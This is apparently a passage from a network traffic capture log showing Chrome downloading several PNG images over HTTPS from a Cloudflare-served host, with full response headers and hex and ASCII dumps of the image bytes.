                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1903INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:29:20 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                                                                                                              Content-Length: 727
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Last-Modified: Sun, 19 Mar 2023 15:20:17 GMT
                                                                                                                                                                                                                                                                                                              ETag: "2d7-5f7425905ae40"
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Tn0LLujDvZj9Zbaw1zEiw3Vlnc6J%2FOlP2KzjmB6lwY%2B98UxKKx5xyM%2BPMTkAWMl6LOEP2h7GQUDjTxLuEw%2FpCbiYeiPuybXOafdMgnK489QrSuxeueUXUMvhPP%2BTRUHdOMrAsWE0JZLc7nM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              CF-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd66a8e2b206a-IAD
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1904INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 02 9e 49 44 41 54 68 43 ed 97 81 51 1c 31 0c 45 8f 0e a0 83 a3 03 e8 60 a9 00 a8 20 a4 02 a0 82 90 0a a0 03 ae 83 90 0a b2 54 00 1d e4 3a 80 0e c8 7f 37 72 c6 ec dc ad e5 b5 73 77 3b 59 cf 68 18 f6 64 4b 5f 5f 92 e5 83 d9 c8 d7 c1 c8 fd 9f 4d 00 76 cd e0 c4 c0 c4 40 61 04 fe df 14 6a 9a e6 50 c1 3b 91 9c 4b 1a 09 ff b3 5e 25 ef 92 e7 b6 6d 17 85 01 4e 6e 1f c4 80 9c bf d1 c9 d7 92 79 d2 c2 6c f6 5d 40 ee 1c 7a 83 54 b2 00 58 d4 1f 65 e9 c2 ac b5 44 5a f2 24 59 1a 0b b0 12 98 e1 6f 60 e5 4c 40 60 a6 ea 72 03 30 e7 7f 99 73 38 42 64 1f fa bc 31 a6 ee 4d 87 3d c7 b5 41 e4 00 f8 61 91 27 c7 2f e5 08 11 4f 2e 81 80 05 40 34 12 6d 6b cf 92 9b 32 14 5c 00 a2
                                                                                                                                                                                                                                                                                                              Data Ascii: PNGIHDR00WIDAThCQ1E` T:7rsw;YhdK__Mv@ajP;K^%mNnyl]@zTXeDZ$Yo`L@`r0s8Bd1M=Aa'/O.@4mk2\
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1904INData Raw: d8 37 09 11 23 72 83 bb 51 6d 10 2e 00 44 5a 86 c3 7d 90 35 cc ad 63 a9 26 88 1c 00 b4 d2 30 13 e1 57 72 1c b0 cb 8e bc 9f 77 db 66 2d 10 6e 00 c6 02 20 18 2d 1a 8b 2c 6c fc 94 30 cb b5 d1 33 93 b6 fb 45 12 1e 34 6b fb 7e 0d 10 59 00 42 3a 74 1e 2a 7d b5 4c cd 00 7a e3 c5 55 0a 62 10 80 0e 10 1e f5 73 13 1c a6 c0 11 9e 9a 0b c9 ea 1d d0 77 f3 96 80 28 02 d0 17 fa 08 e4 6a 74 e8 ae 5a 35 b1 37 00 00 38 84 89 7f 0e a0 1b f9 d4 30 d7 05 11 3f a2 d6 31 b9 77 00 22 26 92 b5 83 ee ce 00 38 6a c2 35 76 4f 00 3c 9d a8 4f 67 53 4d a4 6a 25 9c b9 75 06 bc 45 3d 3a 00 9b 58 4a 3d 3d f7 86 81 d1 02 28 ad a1 9d 33 30 01 28 8d c0 ae f7 4f 29 34 31 50 18 81 d1 a7 d0 1f 70 6b 51 40 66 f8 53 a2 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                                                                              Data Ascii: 7#rQm.DZ}5c&0Wrwf-n -,l03E4k~YB:t*}LzUbsw(jtZ5780?1w"&8j5vO<OgSMj%uE=:XJ==(30(O)41PpkQ@fSIENDB`


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              163104.21.0.95443192.168.2.1649863C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1904INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:29:20 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                                                                                                              Content-Length: 1400
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Last-Modified: Sun, 19 Mar 2023 15:20:17 GMT
                                                                                                                                                                                                                                                                                                              ETag: "578-5f7425905ae40"
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kp514RfUGU7LVYGoR5JCYmTIg%2F1ycLwGuhxHrGmowiFK5pCK7I9IXQWR%2Fu9VGDFQuFv8af7pzhx28MpVoKBwomU8Ck6eU6%2Bk0qfYWHBct%2BecFi75f0SSFRWDUs%2FsNaaBGL1Kh6KZUnqNxqU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              CF-Cache-Status: REVALIDATED
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd66c4b381ff4-IAD
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1905INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 6c 00 00 00 18 08 06 00 00 00 1f d5 18 1a 00 00 05 3f 49 44 41 54 68 43 ed 58 bd 6e 13 41 10 be 4b d2 d0 20 87 b4 48 38 bc 00 c9 13 10 37 50 c6 ee 91 70 9e 00 e7 af 26 ae f3 83 f3 04 18 89 3e 97 92 34 98 27 c0 79 81 60 24 5a c0 d0 d0 24 31 df b7 9a 39 8d 97 3b bc 91 0c 77 91 7c d2 c9 f6 7a 76 76 76 be f9 8f 7f d6 1f 8e a2 b0 e7 db dd e4 62 e9 e5 59 f4 15 e4 f7 42 b6 b4 9f 44 71 08 dd 8c 26 5c 03 f1 0c b0 70 65 95 81 72 06 58 19 50 b8 81 0c 33 c0 6e a0 ac 7f 4d da 6a b5 aa f3 f3 f3 2b a3 d1 a8 72 7d 7d 9d 74 3a 9d a1 7f 66 61 80 6d 6d 6d 35 55 18 08 d9 df df df ef e7 29 64 77 77 77 e5 ea ea 6a 85 ff c7 71 3c 3c 3c 3c 4c f8 7d 67 67 67 0d 1f eb 97 97 97 ed ac cb fd 6b 05 4f 93 3f f4 d1 c2 dd 5e 82 67
                                                                                                                                                                                                                                                                                                              Data Ascii: PNGIHDRl?IDAThCXnAK H87Pp&>4'y`$Z$19;w|zvvvbYBDq&\perXP3nMj+r}}t:fammm5U)dwwwjq<<<<L}gggkO?^g
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1906INData Raw: 35 7c 76 11 9a 69 c1 8f 91 07 8f d5 c3 95 06 eb 8f f0 0e 40 77 0e 63 ea fa a0 6a 0e d5 33 f0 ff a9 9f 77 2c 2f d0 9d 33 dc 29 0d 8b 0c ca 89 b5 75 02 c3 bb 81 e6 8d 9e 83 f5 17 62 a4 7d ac 9f 52 e6 c2 01 83 c0 ab 1a f2 20 60 cd 2a de 84 8a 84 8a 13 60 6d 48 24 98 55 eb 9d 12 42 e9 95 ae 48 31 0f 15 b5 6a 78 0e c0 33 11 9e 24 6b 20 1c f5 00 a0 0b b3 19 1e d7 87 ac 1b 5a 1c 81 cf 9e 14 09 96 34 f5 90 bf c8 41 fa 3e ce aa d1 58 f0 9d 61 2f f4 19 10 30 4e 2e 26 3f 71 f4 eb ee c9 c5 fd bd b3 e8 0b 46 23 77 26 6f 88 22 4c 3a 96 b2 e8 6c 0e 63 cc 86 e0 ac 8e 9a 78 bb 50 ea 86 ee d1 90 40 65 d2 0b 26 01 26 7c 59 a0 10 ac 21 e8 8f 69 d1 f4 00 ee 67 61 63 00 e3 31 43 e6 07 18 cc 0f 49 f4 b4 74 ca e1 ef 65 7e 71 8a 26 e8 36 af 32 42 e0 7d c3 2a 56 ce 70 f2 9b 42 c9
                                                                                                                                                                                                                                                                                                              Data Ascii: 5|vi@wcj3w,/3)ub}R `*`mH$UBH1jx3$k Z4A>Xa/0N.&?qF#w&o"L:lcxP@e&&|Y!igac1CIte~q&62B}*VpB


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              164104.21.0.95443192.168.2.1649862C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1906INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:29:20 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                                                                                                              Content-Length: 70712
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Last-Modified: Thu, 24 Aug 2023 12:58:17 GMT
                                                                                                                                                                                                                                                                                                              ETag: "11438-603aac821e121"
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nbi4YixVbTgl7t4AZpgsmaQohzHIltd13ARWElOx63mkbwlbIeiav4yUs5v8GcwCJhCBQW%2B6pIl8gjWCXlc43SRoh8VDkEVgPDgH44AP2GIw0hmFJNGm87rS26rmnT7bX6RYAG1QdCkj7oE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              CF-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd66beef058b4-IAD
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1907INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 8e 00 00 03 83 08 06 00 00 00 11 c6 07 ce 00 00 20 00 49 44 41 54 78 01 ec dd cf 71 e3 c6 b6 07 e0 09 c1 21 38 04 6f 6e 95 97 13 c2 ac df 7b 0b 87 a0 12 34 7b ef ef 7b 55 0a 41 21 78 e7 ed 84 a0 10 74 33 50 06 7e d5 53 38 36 0d 13 10 4e 13 7f 1a e0 37 55 53 4d 89 0d 10 f8 70 9a 22 1b 3f 82 9f 3e f9 47 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40
                                                                                                                                                                                                                                                                                                              Data Ascii: PNGIHDR IDATxq!8on{4{{UA!xt3P~S86N7USMp"?>G @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1908INData Raw: 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02
                                                                                                                                                                                                                                                                                                              Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1909INData Raw: 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04
                                                                                                                                                                                                                                                                                                              Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1911INData Raw: 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08
                                                                                                                                                                                                                                                                                                              Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1912INData Raw: 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10
                                                                                                                                                                                                                                                                                                              Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1913INData Raw: 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20
                                                                                                                                                                                                                                                                                                              Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1915INData Raw: 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40
                                                                                                                                                                                                                                                                                                              Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1916INData Raw: 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10
                                                                                                                                                                                                                                                                                                              Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1917INData Raw: 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20
                                                                                                                                                                                                                                                                                                              Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1919INData Raw: 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40
                                                                                                                                                                                                                                                                                                              Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1920INData Raw: 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 68 57 e0 3f ff f5 af e7 b7 ff f9 d7 37 ff 19 64 6b a0 b6 aa ff ef f7 9f 7f f9 f7 ef 3f 7f f3 9f 41 b6 06 4a ed d4 d6 9d e5 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 2e 04 4a 58 e8 3f ff fd af 3f fc 67 90 ad 81 8b 32 4a dd fc f7 ef 3f ff fa bf bf ff fc 87 ff 0c b2 35 50 6a 27 55 6c 3a 13 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 5c 17 10 1c 13 18 cb 06 c6 a2 ff f5 8a fa f8 b7 82 63 02 63 d9
                                                                                                                                                                                                                                                                                                              Data Ascii: @ @ @ @ @ @ @ @ @hW?7dk?AJ @ @ @ @.JX??g2J?5Pj'Ul: @ @ @ @\cc
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1921INData Raw: 80 00 01 02 04 08 10 20 40 e0 16 01 c1 31 c1 b1 6c 60 2c fa d7 d6 9d e0 98 e0 58 36 30 16 fd 05 c7 6a 47 9d e5 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 03 01 c1 31 c1 b1 08 82 65 db 41 29 cd fe 51 70 4c 70 2c 82 60 d9 56 70 6c f6 30 d3 91 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 30 2d 20 38 26 38 96 0d 8c 45 ff e9 ca 1a bf 57 70 4c 70 2c 1b 18 8b fe 82 63 e3 e3 ca 3d 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 81 94 80 e0 98 e0 58 04 c1 b2 6d aa d0 2e 3a 0b 8e 09 8e 45 10 2c db 0a 8e 5d 0c 24 37 09 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04
                                                                                                                                                                                                                                                                                                              Data Ascii: @1l`,X60jG @ @ @ @1eA)QpLp,`Vpl0 @ @ @ 0- 8&8EWpLp,c= @ @ @ @Xm.:E,]$7 @ @ @
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:20 UTC1923INData Raw: 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 98 16 10 1c 13 1c cb 06 c6 a2 ff 74 65 8d df 2b 38 26 38 96 0d 8c 45 7f c1 b1 f1 71 e5 1e 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 40 4a 40 70 4c 70 2c 82 60 d9 36 55 68 17 9d 05 c7 04 c7 22 08 96 6d 05 c7 2e 06 92 9b 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 81 5b 04 04 c7 04 c7 b2 81 b1 e8 5f 5b 77 82 63 82 63 d9 c0 58 f4 17 1c ab 1d 75 96 23 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 0c 04 04 c7 04 c7 22 08 96 6d 07 a5 34 fb 47 c1 31 c1 b1 08 82 65 5b c1 b1 d9 c3 4c 47 02 04 08
                                                                                                                                                                                                                                                                                                              Data Ascii: @ @ @te+8&8Eq @ @ @ @@J@pLp,`6Uh"m. @ @ @ @[_[wccXu#@ @ @ @"m4G1e[LG
